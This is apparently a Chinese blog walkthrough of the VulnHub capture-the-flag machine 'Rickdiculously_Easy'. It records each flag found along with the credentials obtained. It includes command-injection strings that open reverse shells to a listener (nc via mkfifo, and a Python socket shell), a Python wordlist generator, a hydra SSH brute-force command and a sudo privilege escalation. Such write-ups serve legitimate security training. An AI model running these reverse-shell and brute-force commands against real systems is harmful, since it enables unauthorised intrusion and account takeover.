Avatar {{帝力于我何有哉}} 不疯魔,不成活。 Be obsessed, or be average.


vulnhub >_ Rickdiculously_Easy

Rickdiculously_Easy

image-20200716014424811

image-20200716014826073

FLAG:{TheyFoundMyBackDoorMorty}-10Points

image-20200719220716779

FLAG:{TheyFoundMyBackDoorMorty}-10Points

image-20200719220849143

FLAG{Flip the pickle Morty!} - 10 Points

ftp可匿名登录

image-20200716015159949

pub文件夹下为空

FLAG{Whoa this is unexpected} - 10 Points

image-20200716021056938

image-20200716021025193

image-20200716021125341

FLAG{Yeah d- just don't do it.} - 10 Points

image-20200716021233642

image-20200716021313449

Password:winter

image-20200716021837588

image-20200716021900523

image-20200716022912544

image-20200716024517223

image-20200716024539575

看来可以尝试命令注入

image-20200716031647637

简单的命令注入

192.168.43.27;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.43.93 1337 >/tmp/f

192.168.43.27;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.97",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);';

但是尝试了一些并不能执行。而我们有一个密码,我们可以先看一下home,确认我们拥有的用户。查看不了,尝试查看passwd

cat并不能正常查看

image-20200716034004356

使用less

image-20200716034139683

经过尝试最终Summer能够使用这个密码进入

Summer:winter
ssh Summer@192.168.43.27 -p 22222

image-20200716034417522

image-20200716035014944

我们之前使用cat也是显示一只猫,所以应该是cat被替换了。仍然使用less

image-20200716035506012

FLAG{Get off the high road Summer!} - 10 Points

image-20200716035909914

image-20200716035955111

image-20200716040105779

密码有乱码混杂,应该是exif信息中含有密码,传回kali

scp -P 22222 Summer@192.168.43.27:/home/Morty/Safe_Password.jpg ./

image-20200716040714802

image-20200716041002433

Meeseek

将压缩文件传回本机

image-20200716041251640

使用密码解压

image-20200716041352957

image-20200716041427512

FLAG: {131333} - 20 Points

image-20200719222043419

找到一个可执行文件

image-20200719222127896

image-20200719222202969

不能在当前目录执行。

image-20200719222255980

image-20200719222901339

传回本地strings一下

image-20200719223612858

%d,deCRYPT %30,后面的字段应该是ahah ah aguments

然后在另外的目录下发现

image-20200719225125939

image-20200716035330583

not a flag.那flag就有可能是参数

尝试使用flag中的内容作为参数。

image-20200719223130857

FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

提供了rick的密码的一些提示,在google上搜索了一下,相关乐队的名字是和The Flesh Curtauns

按照提示密码拥有1个大写字母,1个数字。在加上The ,或Flesh,或者Curtauns。

写一个脚本来生成一个字典

from string import ascii_uppercase
for c in ascii_uppercase:
    for x in range(0, 10):
        print str(c) + str(x) + "The"
        print str(c) + str(x) + "Flesh"
        print str(c) + str(x) + "Curtains"
python mkpasswd.py > passwords.txt

再使用这个字典爆破ssh

hydra -s 22222 -v -l RickSanchez -P passwords.txt 192.168.43.27 ssh

image-20200720020257492

RickSanchez:P7Curtains

登录ssh

image-20200720015925102

sudo -l直接发现可以直接提权,sudo su 提权,查看flag

image-20200720020216891

FLAG: {Ionic Defibrillator} - 30 points